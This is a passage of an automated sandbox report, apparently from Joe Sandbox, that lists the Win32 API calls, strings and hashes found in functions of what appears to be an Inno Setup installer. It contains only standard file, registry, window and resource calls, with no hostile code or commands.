                                                                                  • Opcode Fuzzy Hash: 42dd291e9ca491d6c90a519e805b37db4fc3f45b6415dfc9897799ab7a902921
                                                                                  • Instruction Fuzzy Hash: 213181702043408BD710EF69C981B9B77E5AB48308F04497EF985DF392DB79D945CB2A
                                                                                  APIs
                                                                                    • Part of subcall function 0042423C: SetWindowTextA.USER32(?,00000000), ref: 00424254
                                                                                  • ShowWindow.USER32(?,00000005,00000000,0048B4CB,?,?,00000000), ref: 0048B2D2
                                                                                    • Part of subcall function 0042D714: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D727
                                                                                    • Part of subcall function 0040722C: SetCurrentDirectoryA.KERNEL32(00000000,?,0048B2FA,00000000,0048B497,?,?,00000005,00000000,0048B4CB,?,?,00000000), ref: 00407237
                                                                                    • Part of subcall function 0042D29C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D327,?,?,00000000,?,?,0048B304,00000000,0048B497,?,?,00000005), ref: 0042D2D1
                                                                                    • Part of subcall function 0044F3B0: GetFileSize.KERNEL32(?,00000004,00000000,?,0048B34A,00000000,0048B3C5,?,00000001,00000000,00000002,00000000,0048B497,?,?,00000005), ref: 0044F3BE
                                                                                    • Part of subcall function 0044F3B0: GetLastError.KERNEL32(?,00000004,00000000,?,0048B34A,00000000,0048B3C5,?,00000001,00000000,00000002,00000000,0048B497,?,?,00000005), ref: 0044F3CA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryFileWindow$CurrentErrorLastModuleNameShowSizeSystemText
                                                                                  • String ID: .msg$IMsg$Uninstall
                                                                                  • API String ID: 2328437465-3145681768
                                                                                  • Opcode ID: 1115bd18718136f9f4de00399847780531ec6952b0a2b3ed56259befbe40c538
                                                                                  • Instruction ID: 9a94db9cd62780871c5dc28c4d04ab8b2707699f9b9ed81d7b8f7f755a14b6a5
                                                                                  • Opcode Fuzzy Hash: 1115bd18718136f9f4de00399847780531ec6952b0a2b3ed56259befbe40c538
                                                                                  • Instruction Fuzzy Hash: 67316F34610604AFD701FFA6DC5295E77B5EB89704F518C7AFC00A7252D739AD04CBA9
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 0044F0E0
                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044F122
                                                                                  • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044F153
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$ExecuteShell
                                                                                  • String ID: open
                                                                                  • API String ID: 2179883421-2758837156
                                                                                  • Opcode ID: c0263dec2d714c9ef165ebb36920e0f7901f770f9b5e63aa54b44a94dd517abf
                                                                                  • Instruction ID: d3de98e218a5873cd8f8cdf6ac3544f15ff7399903978a0affdec8e6ba4c9a40
                                                                                  • Opcode Fuzzy Hash: c0263dec2d714c9ef165ebb36920e0f7901f770f9b5e63aa54b44a94dd517abf
                                                                                  • Instruction Fuzzy Hash: 35216F70E40204AFEB10EF69CC86B9EB7B8AB44714F10857AB515B7392D778AE448A48
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000,0048BF15,00000000,0048B772,?,?,00000000,0048E628), ref: 0048B6EC
                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,0048BF15,00000000,0048B772,?,?,00000000,0048E628), ref: 0048B715
                                                                                  • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0048B72E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Attributes$Move
                                                                                  • String ID: isRS-%.3u.tmp
                                                                                  • API String ID: 3839737484-3657609586
                                                                                  • Opcode ID: e6f00ce7c8efcc2f63b029f300908e9f26a44e9b58ea320457e4e7f85ccb1fa0
                                                                                  • Instruction ID: e44588ca08041b850a48fbcde640f57a3398ca32fd7703a32c25fc9a97600d21
                                                                                  • Opcode Fuzzy Hash: e6f00ce7c8efcc2f63b029f300908e9f26a44e9b58ea320457e4e7f85ccb1fa0
                                                                                  • Instruction Fuzzy Hash: 72212670D046199EDB05FFA9C881AAFB7B8EB44314F51453AA814F32D1D7785E018B99
                                                                                  APIs
                                                                                    • Part of subcall function 0042C6CC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C6F0
                                                                                    • Part of subcall function 00403CBC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CF6
                                                                                    • Part of subcall function 00403CBC: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403D01
                                                                                  • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00454168
                                                                                  • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00454195
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                  • String ID: LoadTypeLib$RegisterTypeLib
                                                                                  • API String ID: 1312246647-2435364021
                                                                                  • Opcode ID: 3745abd5e1c0cee4b3c82d80aace1cd466198cd532949e54514a3202a131273b
                                                                                  • Instruction ID: 9a574d80cc91f36ecf1b50e0de1bbf31a8fc57c7e14b48d6230bb9c01a0a2c88
                                                                                  • Opcode Fuzzy Hash: 3745abd5e1c0cee4b3c82d80aace1cd466198cd532949e54514a3202a131273b
                                                                                  • Instruction Fuzzy Hash: 4411A570B00504AFDB00DFA6DC55A4EB7ADEB89345B108475FC04D7652DA389D84CA14
                                                                                  APIs
                                                                                  • FileTimeToLocalFileTime.KERNEL32(00000001), ref: 00467160
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,00000001), ref: 0046716F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$LocalSystem
                                                                                  • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                  • API String ID: 1748579591-1013271723
                                                                                  • Opcode ID: 64553318ed16b7c895a2460181ed042c199627add3ae8b2e9529164c63612219
                                                                                  • Instruction ID: 2ef5946374c2df320a11d4f19beab9d597335e9e66989e0f23e73bcbfd7baca2
                                                                                  • Opcode Fuzzy Hash: 64553318ed16b7c895a2460181ed042c199627add3ae8b2e9529164c63612219
                                                                                  • Instruction Fuzzy Hash: 8E110AA040C3919AD340DF2AC44476BBBE4AB89718F044A6EF8D8D6391E77DC948DB77
                                                                                  APIs
                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00451D57
                                                                                    • Part of subcall function 00406ED4: DeleteFileA.KERNEL32(00000000,0048E628,0048BB48,00000000,0048BB9D,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EDF
                                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00451D7C
                                                                                    • Part of subcall function 004513F0: GetLastError.KERNEL32(00000000,00451E05,00000005,00000000,00451E3A,?,?,00000000,0048E628,00000004,00000000,00000000,00000000,?,0048B811,00000000), ref: 004513F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AttributesDeleteErrorLastMove
                                                                                  • String ID: DeleteFile$MoveFile
                                                                                  • API String ID: 3024442154-139070271
                                                                                  • Opcode ID: 48dc964d6d3ecb5a42746fc5cedd453d814d971b94fc4715f9a91d8384b6f7f3
                                                                                  • Instruction ID: 77d7764a83ece376e705ecc4d91743c99ab9f85987ae99dd7e96c0d1349c0cc4
                                                                                  • Opcode Fuzzy Hash: 48dc964d6d3ecb5a42746fc5cedd453d814d971b94fc4715f9a91d8384b6f7f3
                                                                                  • Instruction Fuzzy Hash: 76F06D702042455AEB05FBA6D853B6EA3E9EB44306F60443BFC00A76D3DB3CAD09492D
                                                                                  APIs
                                                                                    • Part of subcall function 0042DBBC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004787FF,?,00000001,?,?,004787FF,?,00000001,00000000), ref: 0042DBD8
                                                                                  • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00478821
                                                                                  • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00478844
                                                                                  Strings
                                                                                  • System\CurrentControlSet\Control\Windows, xrefs: 004787EE
                                                                                  • CSDVersion, xrefs: 00478818
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                  • API String ID: 3677997916-1910633163
                                                                                  • Opcode ID: c38a58ffadc2519acb239c9a8b8b07f5fe01f5597b544064e2cc289809da586e
                                                                                  • Instruction ID: 5dec16469e9728c7d0f5512b539eec3cf76a517276b3895035cdb78f6c8f87f9
                                                                                  • Opcode Fuzzy Hash: c38a58ffadc2519acb239c9a8b8b07f5fe01f5597b544064e2cc289809da586e
                                                                                  • Instruction Fuzzy Hash: 15F04975E40208A6DF10EAE18C49FDF73BC9B04714F50856FE518E7290EA389A44879E
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00451A52,00000000,00451AF5,?,?,00000000,00000000,00000000,00000000,00000000,?,00451DC1,00000000), ref: 0042D75A
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D760
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                  • API String ID: 1646373207-4063490227
                                                                                  • Opcode ID: fa3503188a21fec3551f51fb383e9c26a4e9ccb2f6bc1b57ff4c90d9d9901ebb
                                                                                  • Instruction ID: eeb5b085118e1f84b29eec818e188fe032506c5bccfc68f9c731416a23a8171b
                                                                                  • Opcode Fuzzy Hash: fa3503188a21fec3551f51fb383e9c26a4e9ccb2f6bc1b57ff4c90d9d9901ebb
                                                                                  • Instruction Fuzzy Hash: B4E026A0F40B1123D71031BA2C83B9B208D4BC4718F90053F3994E52C3DEBDC94026AE
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(00000000,0048BF5A), ref: 00403363
                                                                                  • GetCommandLineA.KERNEL32(00000000,0048BF5A), ref: 0040336E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CommandHandleLineModule
                                                                                  • String ID: @6x$U1h0@
                                                                                  • API String ID: 2123368496-4294024466
                                                                                  • Opcode ID: 59085d0b49fcfa605a7a2ddcf4641a13d7acc65c93a080812811fe6301ed1517
                                                                                  • Instruction ID: dd375aa8f3ea8bff6075c4c1a45ab931b4a850123dfab37fb1bd981860265430
                                                                                  • Opcode Fuzzy Hash: 59085d0b49fcfa605a7a2ddcf4641a13d7acc65c93a080812811fe6301ed1517
                                                                                  • Instruction Fuzzy Hash: C5C0027050121096D7546F6768453096A949741349F804CBFB104BE1E2D6BD47055BEE
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0048BFCE,00000001,00000000,0048BFF2), ref: 0048BD66
                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0048BD6C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                  • API String ID: 1646373207-834958232
                                                                                  • Opcode ID: 1568cb0c86606ab2882df0416f786a826984cfe2f6b26898b31995671378dd0c
                                                                                  • Instruction ID: d567e3e26b825faa254ae6eddedfe30fc1e0c903920d0363351ee2e8a26f4d57
                                                                                  • Opcode Fuzzy Hash: 1568cb0c86606ab2882df0416f786a826984cfe2f6b26898b31995671378dd0c
                                                                                  • Instruction Fuzzy Hash: 5DB09280281B01B8882032B20C02A6F08C8CC80B557104D273800A40C3CF6D840006AD
                                                                                  APIs
                                                                                  • GetDesktopWindow.USER32 ref: 00413CBE
                                                                                  • GetDesktopWindow.USER32 ref: 00413D76
                                                                                    • Part of subcall function 00418E38: 6F59C6F0.COMCTL32(?,00000000,00413F3B,00000000,0041404B,?,?,0048E628), ref: 00418E54
                                                                                    • Part of subcall function 00418E38: ShowCursor.USER32(00000001,?,00000000,00413F3B,00000000,0041404B,?,?,0048E628), ref: 00418E71
                                                                                  • SetCursor.USER32(00000000,?,?,?,?,00413A6B,00000000,00413A7E), ref: 00413DB4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CursorDesktopWindow$Show
                                                                                  • String ID:
                                                                                  • API String ID: 2074268717-0
                                                                                  • Opcode ID: f0c6017c59b8bb84696cb7242aa19b668bc731c182cc8e527b5126bc0e3edadd
                                                                                  • Instruction ID: 64b758bc906b237be152dd2e2d66eb182076003d3b38fb397695b56225ec0e7c
                                                                                  • Opcode Fuzzy Hash: f0c6017c59b8bb84696cb7242aa19b668bc731c182cc8e527b5126bc0e3edadd
                                                                                  • Instruction Fuzzy Hash: 20412C71600161AFC710EF6AE994B5A77E1AB45309B14887EE404DB365EB38EC81CF5C
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 004089F9
                                                                                  • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408A68
                                                                                  • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B03
                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408B42
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString$FileMessageModuleName
                                                                                  • String ID:
                                                                                  • API String ID: 704749118-0
                                                                                  • Opcode ID: 77edbe989cca7868f7a4dec83b5543f530bbc54123075913c070f769239a867b
                                                                                  • Instruction ID: 314dda993e929c1eab837e296c1858fea1839370f922fa9ff26c3572de8cc571
                                                                                  • Opcode Fuzzy Hash: 77edbe989cca7868f7a4dec83b5543f530bbc54123075913c070f769239a867b
                                                                                  • Instruction Fuzzy Hash: DC3143706083819BD730EB65C945B9B77E89B85304F00483EB6C8DB2D2DBB99908875B
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044DB11
                                                                                    • Part of subcall function 0044C284: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C2B6
                                                                                  • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044DB95
                                                                                    • Part of subcall function 0042BB2C: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BB40
                                                                                  • IsRectEmpty.USER32(?), ref: 0044DB57
                                                                                  • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044DB7A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                  • String ID:
                                                                                  • API String ID: 855768636-0
                                                                                  • Opcode ID: 8af4f98d8fc6d806c7a94780856b610479f9d8d3ed524de24c51593afe400112
                                                                                  • Instruction ID: 83d1422465a7b0ee437381a695a88c835cb90bdebad6bd947e330a63830ec128
                                                                                  • Opcode Fuzzy Hash: 8af4f98d8fc6d806c7a94780856b610479f9d8d3ed524de24c51593afe400112
                                                                                  • Instruction Fuzzy Hash: 7E115C72B4034027E710BA7E8C86B5B66C99B88719F05083FB505DB386DEBDDC0987A9
                                                                                  APIs
                                                                                  • OffsetRect.USER32(?,?,00000000), ref: 00488EF4
                                                                                  • OffsetRect.USER32(?,00000000,?), ref: 00488F0F
                                                                                  • OffsetRect.USER32(?,?,00000000), ref: 00488F29
                                                                                  • OffsetRect.USER32(?,00000000,?), ref: 00488F44
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: OffsetRect
                                                                                  • String ID:
                                                                                  • API String ID: 177026234-0
                                                                                  • Opcode ID: e81ae7f2caf9aec22ba0510ea3b0fb9de74715cda27e0d8b4d8a114a333f3df3
                                                                                  • Instruction ID: d62951bcb834efd58146c923cf990393df8725736bfb43200c47b4a7af113c1b
                                                                                  • Opcode Fuzzy Hash: e81ae7f2caf9aec22ba0510ea3b0fb9de74715cda27e0d8b4d8a114a333f3df3
                                                                                  • Instruction Fuzzy Hash: 7D217FB67002019BD300EE69CC81E6BB7DEEBD4300F54CA2EF654C7249DA34ED0487A6
                                                                                  APIs
                                                                                  • GetCursorPos.USER32 ref: 004171D8
                                                                                  • SetCursor.USER32(00000000), ref: 0041721B
                                                                                  • GetLastActivePopup.USER32(?), ref: 00417245
                                                                                  • GetForegroundWindow.USER32(?), ref: 0041724C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1959210111-0
                                                                                  • Opcode ID: 1799a7e174320d619a498122682a732831b39891e2c7dcb4a2201c3f930e80bf
                                                                                  • Instruction ID: 8eb21dcc9f0f8c3d11a2d46453fd076125ddb4d673840b04466c48ea7b4f8592
                                                                                  • Opcode Fuzzy Hash: 1799a7e174320d619a498122682a732831b39891e2c7dcb4a2201c3f930e80bf
                                                                                  • Instruction Fuzzy Hash: CF21B3303092008BC710AF6AC885ADB73B1AB18B14F5545AFF8549B352D73DECC2CB49
                                                                                  APIs
                                                                                  • MulDiv.KERNEL32(8B500000,00000000,?), ref: 00488C3D
                                                                                  • MulDiv.KERNEL32(50142444,00000008,?), ref: 00488C50
                                                                                  • MulDiv.KERNEL32(F7CA5BE8,00000000,?), ref: 00488C6C
                                                                                  • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00488C93
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 10ac2284ee4a88d26f48f241d33b83035561a6eb0bc83b47bbef4b78f9737fa9
                                                                                  • Instruction ID: 608124dcb08c08b7df3781a1a678c724002014d46ac8060f57d842aaa6918574
                                                                                  • Opcode Fuzzy Hash: 10ac2284ee4a88d26f48f241d33b83035561a6eb0bc83b47bbef4b78f9737fa9
                                                                                  • Instruction Fuzzy Hash: 3A21CAB6A00105AFCF40DFADC8C4E9EB7ECAF0C314B544596F908DB346D674DA408B64
                                                                                  APIs
                                                                                  • GetClassInfoA.USER32(00400000,0041F3E8,?), ref: 0041F419
                                                                                  • UnregisterClassA.USER32(0041F3E8,00400000), ref: 0041F442
                                                                                  • RegisterClassA.USER32(0048D598), ref: 0041F44C
                                                                                  • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F487
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4025006896-0
                                                                                  • Opcode ID: c3570dde28a4df0adf3192aed0b77af98d5b2f7e8ccb7ab0dd3fccb9991045e9
                                                                                  • Instruction ID: aa51f1ef8962ce2c4906b6fd7a46fc61082b752345adcd4a5a3fddf9aa943e0b
                                                                                  • Opcode Fuzzy Hash: c3570dde28a4df0adf3192aed0b77af98d5b2f7e8ccb7ab0dd3fccb9991045e9
                                                                                  • Instruction Fuzzy Hash: C9014471640114BBCA10FBA9DC81E9F3798A719318B10493BB505EB2E1C635D9558B6D
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D18F
